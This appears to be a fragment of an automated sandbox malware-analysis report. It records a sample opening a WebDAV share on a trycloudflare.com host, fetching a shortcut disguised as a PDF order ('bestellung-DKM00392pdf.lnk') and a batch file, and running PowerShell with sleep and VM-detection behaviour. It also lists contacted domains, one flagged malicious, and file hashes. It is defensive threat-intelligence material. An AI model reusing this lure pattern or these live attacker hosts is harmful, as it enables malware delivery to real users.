Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF64EC64 pushad ; iretd	36_2_00007FF9BF64EC65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF6461DA push ds; ret	36_2_00007FF9BF64621F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF6442D0 push esp; iretd	36_2_00007FF9BF644319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF6442B5 push esp; iretd	36_2_00007FF9BF644319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2D0D0 pushad ; retf	36_2_00007FF9BFB359DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC784A5 pushad ; iretd	36_2_00007FF9BFC784F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC763C5 push edi; iretd	36_2_00007FF9BFC763E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC76365 push edi; iretd	36_2_00007FF9BFC763E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC7DAF0 push esp; retf	36_2_00007FF9BFC7DAF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC7D6DF pushfd ; iretd	36_2_00007FF9BFC7D6E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC784E0 pushad ; iretd	36_2_00007FF9BFC784F2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1472	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3164	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2323	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7369	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1048	Thread sleep count: 3164 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5136	Thread sleep count: 269 > 30	Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 2424	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4068	Thread sleep count: 2323 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4068	Thread sleep count: 7369 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Source: cmd.exe, 0000001E.00000003.2318311250.0000025D62B3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000011.00000002.1551843850.000001EC8FB93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B537B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: cmd.exe, 0000001E.00000003.2318311250.0000025D62B3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\G
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686564000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2407822609.0000013E4F8CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: rundll32.exe, 00000018.00000002.1742704031.0000028904A24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK

Source: C:\Windows\System32\conhost.exe	Queries volume information: \Device\Mup\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\bestellung-DKM00392pdf.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\	Jump to behavior
Source: C:\Windows\System32\conhost.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\bestellung-DKM00392pdf.lnk	Jump to behavior
Source: C:\Windows\System32\conhost.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE	Jump to behavior
Source: C:\Windows\System32\conhost.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\bestellung-DKM00392pdf.lnk	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
162.125.66.15	edge-block-www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
104.16.231.132	retailer-indicators-resume-key.trycloudflare.com	United States	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
96.7.168.138	unknown	United States	262589	INTERNEXABRASILOPERADORADETELECOMUNICACOESSABR	false

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
edge-block-www-env.dropbox-dns.com	162.125.66.15	true
www.google.com	142.250.185.228	true
retailer-indicators-resume-key.trycloudflare.com	104.16.231.132	true
x1.i.lencr.org	unknown	unknown
dl.dropboxusercontent.com	unknown	unknown

ID:	1541917
Product:	CloudBasic
Start time:	10:15:12
Start date:	25.10.2024
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG	ASCII text	A9BB05A54A0A0A98D8918954AD95F7F4	CCE1065DEE665A5691EB67836A11B0A97AECE93F	70C61D06011D208F2137204FFC31D8EAAFD9A69DAD650D5A138102AF9D1A552A
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)	ASCII text	A9BB05A54A0A0A98D8918954AD95F7F4	CCE1065DEE665A5691EB67836A11B0A97AECE93F	70C61D06011D208F2137204FFC31D8EAAFD9A69DAD650D5A138102AF9D1A552A
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG	ASCII text	D770DAFDE84DFF5847D550DB5C6DCCBE	3EB158FF5E4BE00BDAA755A54AE5931AB209CAF3	8186BE042CC14FC571C476384CAB215DBA554D1F5E1633443FAB93985603D619
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)	ASCII text	D770DAFDE84DFF5847D550DB5C6DCCBE	3EB158FF5E4BE00BDAA755A54AE5931AB209CAF3	8186BE042CC14FC571C476384CAB215DBA554D1F5E1633443FAB93985603D619
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log	data	0AD07A14E68E978BBA8DF325057093FA	4D11B5008D9E09DB6352653C7BD0D483C3E5C23E	7585683D2D77522974A4114B860A96567DCB8130ED6673A35945177EB49F279B
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG	ASCII text	162DEA4624BB861AAC4154705E24B0AB	48C981C9A6046C0E2FAFB73F2D0EC56051C9309E	DF9AEF67068EEA417A7A63015522E3C620F38E34E1E6A55C524AF9BD19A2B226
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)	ASCII text	162DEA4624BB861AAC4154705E24B0AB	48C981C9A6046C0E2FAFB73F2D0EC56051C9309E	DF9AEF67068EEA417A7A63015522E3C620F38E34E1E6A55C524AF9BD19A2B226
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages	SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11	C6468AAFCBBA9A6DB1F20C79FDE356B1	377D2282123D0D37FF046D2F88442E1B1325CA44	17D6D7376AEA8F35DFEB2C708B410192A5142479E83B08F26C878BBCB480FE19
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal	SQLite Rollback Journal	9D087552C98BE6957F1159827C09CD13	8255AFFE1D43C9189A54296D15F43DF9A5F6CDD0	DFC25D512DEA9262754F1AA71C7DE51C6A5EE8BF1E03FA27D89D022CED85883C
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D	Certificate, Version=3	0CD2F9E0DA1773E9ED864DA5E370E74E	CABD2A79A1076A31F21D253635CB039D4329A5E8	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D	data	89AAC017234D0827DA7A1B0902EDAC6D	8E8369239C63AF4699104037C746D83092AB8DAB	DAFFBB283918408FE7AE990BD1F3F7147F3E7885C64A1E6A3807175E4E271E49
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	0AFE878C2DC0B032D2BEFE824DFBA78A	C3EB5190BE4F0736EA4B65D2D0C658A4B1300C91	9E69F2B60993F7EB0348FBC572A255C1288A35C3807C715C7E65064D1A6879CF
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5788	PostScript document text	94185C5850C26B3C6FC24ABC385CDA58	42F042285037B0C35BC4226D387F88C770AB5CAA	1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)	PostScript document text	94185C5850C26B3C6FC24ABC385CDA58	42F042285037B0C35BC4226D387F88C770AB5CAA	1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID	JSON data	9BC0526F9A4151882C58C3D96C85AD51	08461EB1F64615D46FDE4E3462FDABE2D2B63950	4B1E2E5846D0C909D2B2EE4D2AF481BC6199F6141A904CB46E53470672A7CF77
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface	JSON data	B8EB7598FE0AE60695362095E6BFB21D	36CDBF275A415E6790323E9CD04472A978C2AB92	05B06895383ECBF8155D1F5AB1E761565D8DDC64B5EC1BA65CFCEA9194423B99
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface	JSON data	C34B0DE0A7441D580BCAA3ECEA46D2ED	BF3D862E4636C2C21D4FFD84EE62EA6ABBAC9D4F	A7B72BCBADC0F70F634DB225C73FA89AB94F6AF6533DF8B3DCF84C07DDA18F0A
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD	JSON data	45AA5412D37ED0AA968A693C4317985E	5B15FFE883F709F16A16EA00CC441A28B6F4E961	43AE34318D44976FA9B7C2F0E436C4C70AF544A787810A2DB252EA1AF3AF6042
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner	JSON data	16466123E79A56E7BDFA4AB17B0079A6	465C297A0055A42B9F6B7C1CEE014A39534CD04F	EAADEEF4E47979DA9B1B8192743E1BF48FB68C6908936331D8AE1DE7CEB04DA9
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner	JSON data	AA1AE5A3AC5DA6E7AC06C6D937C57933	FB9205F4273339F25585734B6B730991A265569F	E48AB4A0C51CE6462C0C3FE69711F0C08E78C2924B7C76091BC91CF0178EF0AD
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention	JSON data	5EF2E802E2D83EC2B89A66515F30B39B	5E5523B459621356D28296C674009A80EF3295C3	208D8F01A15806BB5A09665AFEA0E0E506C2A8F2EC88F6DA141D1C8F910B607B
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner	JSON data	3F0438216134E4220D6807EBFBE8A3C9	C11274FDBAF242252D71BBF3104A18EABF184DD7	F6C8405D47CA28DDF8DE66092BF378459012718B727F42FBB0FD59DE4420D1C0
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner	JSON data	B37911FA13D721EB8E93C7B558CCB7F6	C447CB75512923DC1E6648E5EFB666B7BED8C493	16CC39BCF5F744A9380A113FF87380B284FDCF600707B35F7C0AD2E41D9E6362
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner	JSON data	D6AABB06F7967369D7A2F2C665D382CA	A15AEABEE35D9532FD775971D5F297E86C31BD83	566B2FF83EB4656A9BF2DCA69B3B56C909F44E6F389B09E0863EABD60FD30BE8
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner	JSON data	CA7F70A0BCEACEEA0E3E4CFBBB55AEB6	B5D466E0DEACF778692CC6959B2ED48A6BED903A	574CC81D0A95AA48AEF3E4272FA98D7008F45DE040AED89A13F5D1956FA60F66
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner	JSON data	81990F1C3D8D5B3855007E055BF81960	E680C420370F9C6F6FB7497DDD76F5FF45D9BC9A	CD592E8F8FCD482F9FD27BA4B5FCBA41E811012F36AFD0FB2E55CCEF9807DE0E
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention	JSON data	A405DD1A1EDD68332094F1EEB9AA3004	924B83F07A34756C84B0C70CBEBFAD24ED746082	6A21010443E1BD2C6939EAF64806695433D6566B363315CD8DE75C5283EE82C0
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner	JSON data	8906F01C5C7F9C8A4A8B726EF303F1E4	5AA5FF47D2C52C85C71B7E4BA1A215744B425130	48CEB0C3BBC73F91A59EC94DD5CF13A86961FCBB5CDC1E316DFCD5A9491CED7E
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards	JSON data	ABDF39575360743E0A07348814C3BB61	33E91A1D653C63AF6418C56E72BE7282EACD7EEE	ED46243E2B9A85080788C6F847BAC326CDBE31694310DACE1F67BC91A398B538
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020	JSON data	17ED11F5C52C4DD3E1510ED29B3BF7EC	B70D002A3A7B607E239755F6D645C47F910788BA	70CA43A95C82CA95522F897448A1275B453EBD5ED8FFFFACCC713D5F33EBDA85
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING	data	DC84B0D741E5BEAE8070013ADDCC8C28	802F4A6A20CBF157AAF6C4E07E4301578D5936A2	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json	JSON data	7C8E3B7DD9CF37589E788D065E4E96EB	D96540EA223C517623D71EE82ADA609E84C51940	269C8813DD0FAFA45124AA30AE17FDDF37343EB92AD718DF45E6B7CBD1CAECC5
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents	SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 23	1E8B5489101C15A198D3C2ECDED0A17D	3FDA90746765EF90AEE93523CA2FA88C1ACDD5C2	2C14BB08A8A7F3E851826D573DAE01DE707D49601C101DAF4D0882686E8C0223
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal	SQLite Rollback Journal	B82F6C6424EDB02F1F8D553D77EB9BE4	36AD9E40FAC86C855D6B09F86E8606ABA6065A20	2C17C143B9AFE6BE9415AE4DC6908C841D079D22F11B933CC9F1F33FC9E488D8
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	D3594118838EF8580975DDA877E44DEB	0ACABEA9B50CA74E6EBAE326251253BAF2E53371	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
C:\Users\user\AppData\Local\Temp\MSI4f600.LOG	Unicode text, UTF-16, little-endian text, with CRLF line terminators	7C5ABC525AD3C37489A51739144C3CB2	65C631F646E2BE924142EF2F9A0045FF056BBDBD	BC6B19C8DB81FE659E40B4C95C4AA1843742E28DD441E823FE05F9456AD1063F
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ka0uob4e.cto.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmadkynu.1ms.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2eu0te0.vxu.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
